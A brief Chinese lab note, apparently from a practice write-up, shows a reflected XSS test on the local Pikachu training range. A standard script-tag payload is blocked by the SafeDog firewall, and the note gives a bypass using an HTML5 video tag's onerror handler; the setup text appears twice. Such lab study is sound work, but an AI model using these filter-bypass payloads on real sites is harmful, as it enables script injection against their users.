环境准备:
打开pikachu靶场
http://127.0.0.1/pikachu-master/vul/xss/xss_reflected_get.php
使用常见payload被安全狗拦截
<script>alert("@@")</script>
绕过
1)HTME5新标签<video>绕过:
绕过payload:
<video src=1 onerror=alert(/渣渣辉/)>
环境准备:
打开pikachu靶场
http://127.0.0.1/pikachu-master/vul/xss/xss_reflected_get.php
使用常见payload被安全狗拦截
<script>alert("@@")</script>
绕过payload:
<video src=1 onerror=alert(/渣渣辉/)>